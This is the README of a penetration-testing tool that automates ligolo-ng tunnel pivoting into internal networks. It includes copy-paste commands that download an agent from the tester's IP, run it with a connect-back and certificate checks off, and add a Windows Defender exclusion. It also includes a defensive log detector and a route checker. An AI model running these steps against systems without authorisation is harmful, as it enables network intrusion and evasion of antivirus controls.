
Real-Fruit-Snacks/Culvert

Culvert


Pivot under the obstruction — one-command ligolo-ng tunnel setup.

Auto-downloads proxy and agent binaries, configures TUN interface, starts a file server for agent transfer, and provides copy-paste commands with your IP pre-filled. No proxychains needed -- access target networks directly.

Authorization Required: Designed exclusively for authorized security testing with explicit written permission.


Quick Start

Prerequisites

  • Linux (Kali, Ubuntu, Debian) with root/sudo
  • curl, jq, tar (binary download and extraction)
  • python3 (optional, for HTTP file server)

Install

curl -O https://raw.githubusercontent.com/Real-Fruit-Snacks/Culvert/main/culvert.sh
chmod +x culvert.sh

Run

sudo ./culvert.sh auto

Follow the on-screen instructions to transfer the agent, connect, select a session, add routes, and start the tunnel.

Verify

# After tunnel is running, test connectivity
nmap -sV 10.10.10.0/24           # Scan target network
ssh user@10.10.10.20             # SSH to internal host
curl http://10.10.10.50          # Access internal web server

Cleanup

sudo ./culvert.sh cleanup

Features

One-Command Setup

Run sudo ./culvert.sh auto and the script downloads ligolo-ng binaries, creates the TUN interface, starts a file server on port 8000, and launches the proxy.

sudo ./culvert.sh auto

Auto IP Detection

Automatically detects your attack IP by checking tun0, tun1, tap0, and the default route in priority order. All generated commands use your actual IP.

# Detection order: tun0 -> tun1 -> tap0 -> default route

Multi-Platform Agents

Downloads agent binaries for Linux (amd64/arm64), Windows (amd64), and macOS (arm64). Transfer commands provided for each platform including curl, PowerShell iwr, and certutil fallback.

./culvert.sh agent-cmd            # Show all agent commands
./culvert.sh agent-cmd 10.0.0.1   # With custom IP

Clean Teardown

Removes all routes, stops the file server and proxy, and tears down the TUN interface in order. No orphaned processes or stale routes left behind.

sudo ./culvert.sh cleanup

Modular Commands

Each operation is available as a standalone subcommand for granular control over the setup process.

./culvert.sh download              # Download binaries only
sudo ./culvert.sh setup-tun        # Create TUN only
sudo ./culvert.sh add-route 10.10.10.0/24
./culvert.sh status                # Show current state

Step-by-Step Guidance

After setup, the script displays numbered steps with exact commands for agent transfer, connection, session selection, route addition, and tunnel start.

STEP 1: Download agent on target machine
  curl http://10.10.14.5:8000/ligolo-agent -o /tmp/a && chmod +x /tmp/a
STEP 2: Run agent on target
  /tmp/a -connect 10.10.14.5:11601 -ignore-cert
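From the defender's side, the two steps above (and the Defender exclusion shown under Troubleshooting) leave recognisable process command lines. The following is an added example, not part of Culvert or ligolo-ng, that flags them in a process-creation log; the log layout, host names and rule names are assumptions made up for the illustration.

```bash
#!/usr/bin/env bash
# Added example, not part of Culvert or ligolo-ng. The log layout
# ("<time> <host> <command line>"), hosts and rule names are constructed.

sample_log() {
cat <<'EOF'
2026-01-12T09:14:02Z web01 curl http://10.10.14.5:8000/ligolo-agent -o /tmp/a
2026-01-12T09:14:05Z web01 /tmp/a -connect 10.10.14.5:11601 -ignore-cert
2026-01-12T09:15:40Z ws07 powershell Add-MpPreference -ExclusionPath "C:\Users\Administrator\a.exe"
2026-01-12T09:16:10Z web01 curl https://example.org/health
2026-01-12T09:17:33Z db02 /usr/local/bin/backup -connect 10.0.0.9:5432
EOF
}

# Match on arguments, not on binary name or port: the page itself renames
# the agent to /tmp/a and shows PROXY_PORT=443 as an alternative to 11601.
detect() {
    awk '
    {
        host = $2; cmd = $0
        sub(/^[^ ]+ [^ ]+ /, "", cmd)          # strip time and host fields
        lc = tolower(cmd); rule = ""
        if (lc ~ /-connect +[^ ]+:[0-9]+/ && lc ~ /-ignore-cert/)
            rule = "agent-ignore-cert"          # outbound connect, TLS check disabled
        else if (lc ~ /add-mppreference/ && lc ~ /-exclusionpath/)
            rule = "defender-exclusion"         # AV exclusion added from a shell
        else if (lc ~ /(curl|wget) .*http:\/\/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:[0-9]+\// && lc ~ /-o +\/tmp\//)
            rule = "fetch-to-tmp"               # plain-HTTP pull from a bare IP into /tmp
        if (rule == "") next
        hits[host] = hits[host] " " rule
        print host "\t" rule "\t" cmd
    }
    END {
        # A host that both staged a file and started the agent is the strongest signal.
        for (h in hits)
            if (hits[h] ~ /fetch-to-tmp/ && hits[h] ~ /agent-ignore-cert/)
                print h "\tstaged-then-connected\t-"
    }'
}

sample_log | detect
```

The db02 line has a -connect argument but no -ignore-cert, so it is not flagged; requiring both arguments keeps ordinary client tools out of the results.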

Reach the Agent's Own Localhost

Ligolo-ng treats 240.0.0.0/4 as a magic redirect range: any packet to a 240.x.x.x address is forwarded to the agent's own 127.0.0.1. One subcommand wires up a 240.0.0.1/32 route so you can scan and hit services bound to the agent's loopback (databases, admin panels, stray SSH) directly from your host:

sudo ./culvert.sh localhost

# Then, from any terminal:
nmap -sV 240.0.0.1              # scan the agent's local ports
curl http://240.0.0.1:8080/     # hit an admin panel bound to 127.0.0.1:8080
ssh user@240.0.0.1              # SSH to the agent itself

See the ligolo-ng Localhost docs for the full protocol details.

WebUI Dashboard

Ligolo-ng ships a web dashboard for managing agents, sessions, and tunnels in a browser. Culvert enables it via a dedicated subcommand or by setting WEBUI=1 in front of auto:

# Option A: start proxy + WebUI only (binaries and TUN already in place)
sudo ./culvert.sh webui

# Option B: full auto setup with WebUI enabled alongside the CLI
WEBUI=1 sudo ./culvert.sh auto

# Custom bind address (default 127.0.0.1:8443); a non-loopback address exposes the dashboard and REST API on that interface
WEBUI_LISTEN=10.10.14.5:8443 WEBUI=1 sudo ./culvert.sh auto

On first launch the proxy console prompts once for an admin username and password; those are persisted under ~/.ligolo-proxy/ and reused on subsequent runs. The dashboard then lives at https://<WEBUI_LISTEN>/ — point a browser at it (self-signed TLS → expect the browser warning).

See the ligolo-ng WebUI docs for a feature tour.


Architecture

culvert.sh          Single-file setup script (all logic)
README.md           Documentation
LICENSE             MIT License

The script follows a linear execution flow: download binaries from GitHub releases, create a TUN interface via ip tuntap, start a Python HTTP file server for agent transfer, then launch ligolo-proxy with a trap to clean up on exit.


All Commands

Command             Root   Description
auto                Yes    Full setup -- download, configure, start proxy
cleanup             Yes    Stop proxy, file server, remove routes and TUN
download            No     Download ligolo-ng binaries to ~/.ligolo-ng
setup-tun           Yes    Create and activate TUN interface
teardown-tun        Yes    Remove TUN interface
proxy [opts]        No     Start proxy with custom options
add-route <cidr>    Yes    Add route to TUN
del-route <cidr>    Yes    Remove route from TUN
localhost           Yes    Add 240.0.0.1/32 route — reaches the agent's own 127.0.0.1
webui               Yes    Start the proxy with the ligolo-ng WebUI dashboard enabled
agent-cmd [ip]      No     Show agent commands for all platforms
status              No     Show binary, TUN, route, and proxy status

Configuration

Variable        Default           Description
LIGOLO_DIR      ~/.ligolo-ng      Binary storage directory
TUN_NAME        ligolo            TUN interface name
PROXY_PORT      11601             Proxy listen port
WEBUI           0                 Enable the WebUI in auto mode (1 to turn on)
WEBUI_LISTEN    127.0.0.1:8443    WebUI + REST API bind address

PROXY_PORT=443 sudo ./culvert.sh auto
LIGOLO_DIR=/opt/ligolo sudo ./culvert.sh download

Troubleshooting

Agent won't connect -- Ensure the proxy port is open:

iptables -I INPUT -p tcp --dport 11601 -j ACCEPT

Windows Defender blocks agent -- Add exclusion before downloading:

Add-MpPreference -ExclusionPath "C:\Users\Administrator\a.exe"

Connection drops when adding route -- Do not route the target's own network through ligolo. Route only the internal networks behind the target.

Invalid CIDR prefix -- The network address must align to the prefix boundary (e.g., 10.1.146.0/24, not 10.1.146.5/24).
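The two route pitfalls above can be checked before a route is added. The following is an added example, not code from culvert.sh; the function names are hypothetical, and it assumes you know the address the agent connects from.

```bash
#!/usr/bin/env bash
# Added example, not part of culvert.sh. Function names are hypothetical.

ip_to_int() {  # dotted quad -> integer; returns 1 if malformed
    local o old_ifs="$IFS"
    case $1 in ''|*[!0-9.]*|*.) return 1 ;; esac
    IFS=.; set -- $1; IFS="$old_ifs"
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        case $o in ''|0?*|????*) return 1 ;; esac  # no empty or zero-padded octets
        [ "$o" -le 255 ] || return 1
    done
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

prefix_mask() {  # prefix length -> netmask as integer
    echo $(( $1 == 0 ? 0 : (0xFFFFFFFF << (32 - $1)) & 0xFFFFFFFF ))
}

cidr_network() {  # "addr/len" -> aligned "network/len"; returns 1 if malformed
    local len n
    case $1 in */*) len="${1#*/}" ;; *) return 1 ;; esac
    case $len in ''|*[!0-9]*|0?*|???*) return 1 ;; esac
    [ "$len" -le 32 ] || return 1
    n=$(ip_to_int "${1%/*}") || return 1
    n=$(( n & $(prefix_mask "$len") ))
    echo "$(( (n >> 24) & 255 )).$(( (n >> 16) & 255 )).$(( (n >> 8) & 255 )).$(( n & 255 ))/$len"
}

cidr_contains() {  # CIDR IP -> 0 if IP, masked to the same prefix, equals the network
    [ "$(cidr_network "$2/${1#*/}")" = "$(cidr_network "$1")" ]
}

# check_route CIDR AGENT_IP -> 0 ok, 1 misaligned, 2 covers the agent, 3 malformed
check_route() {
    local net
    net=$(cidr_network "$1") || { echo "malformed CIDR: $1"; return 3; }
    ip_to_int "$2" >/dev/null || { echo "malformed agent address: $2"; return 3; }
    if [ "$net" != "$1" ]; then
        echo "misaligned: use $net instead of $1"; return 1
    fi
    if cidr_contains "$1" "$2"; then
        echo "refusing: $1 contains the agent's address $2"; return 2
    fi
    echo "ok: $1"
}

check_route 10.1.146.5/24 192.168.50.7 || true   # constructed demo values
```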


Security

Report vulnerabilities via SECURITY.md -- do not open public issues.

Culvert does not:

  • Modify ligolo-ng source code or binaries
  • Store credentials or sensitive data
  • Persist after cleanup
  • Open ports other than the proxy port and file server
  • Bypass any security controls

Credits


License

MIT -- Copyright 2026 Real-Fruit-Snacks